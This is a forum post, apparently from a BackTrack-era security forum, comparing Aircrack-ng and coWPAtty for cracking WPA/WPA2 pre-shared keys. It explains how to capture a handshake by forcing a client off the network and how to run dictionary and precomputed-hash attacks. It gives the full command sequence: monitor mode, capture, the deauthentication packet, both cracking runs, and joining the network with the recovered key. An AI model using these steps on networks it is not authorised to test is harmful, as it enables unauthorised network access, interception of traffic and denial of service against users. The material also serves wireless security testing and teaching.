Results 1 to 10 of 38

Thread: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

Threaded View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010

    Lightbulb [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Watch videoon-line:
    Download video:

    What is this?

    Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.
    It shows 4 different cracks, the time taken and speed of the crack (see results).
    > Aircrack-ng (Dictionary)
    > Aircrack-ng & airolib-ng (Pre-computed hashes)
    > coWPAtty (Dictionary)
    > coWPAtty & Genpmk (Pre-computed hashes)

    How does this work?
    To crack WPA/WPA2 PSK you need to capture a ‘Handshake’ . The best way to this packet the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the user).

    Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, its just a question of waiting to process the dictionary file.

    From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.

    If there isn't a connected client - you cant do this. If the network key isnt in the dictionary file - you cant do this.

    You can speed the the cracking process by creating pre-calculated hash files (see results - for how much faster!)

    *For the table see blog*

    What do I need?
    > Aircrack-ng suite
    > WiFi card that supports monitor mode
    > Big dictionary
    > Processing power

    Name: Aircrack-ng
    Version: 1.0-rc3
    Home Page:
    Download Link:

    Name: coWPAtty
    Version: 4.3
    Home Page:
    Download Link:

    airmon-ng start wlan0
    airodump-ng mon0
    airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0
    aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
    aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt
    airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
    airolib-ng crackwpa --import essid essid
    airolib-ng crackwpa --stats
    airolib-ng crackwpa --clean all
    airolib-ng crackwpa --batch
    airolib-ng crackwpa --verify all
    aircrack -r crackwpa output-01.cap
    cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt
    genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
    cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash
    wpa_passphrase g0tmi1k precivilization > wpa.conf
    wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
    dhclient -r
    dhclient wlan0


    Song: First Sate - Off the Radar (First State's 808 Clash Mix)
    Video length: 08:38
    Capture length: 01:14:29

    Blog Post:
    Forum Post:
    Last edited by g0tmi1k; 03-05-2011 at 03:15 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Cracking WiFi - WEP with a client (aircrack-ng)
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 04-18-2011, 04:09 AM
  2. [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
    By g0tmi1k in forum BackTrack Videos
    Replies: 50
    Last Post: 04-08-2011, 07:35 AM
  3. Replies: 20
    Last Post: 07-22-2010, 10:38 AM
  4. Understanding WPA2 cracking
    By Emiree in forum Beginners Forum
    Replies: 2
    Last Post: 03-05-2010, 10:51 AM
  5. Replies: 1
    Last Post: 01-14-2010, 05:58 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts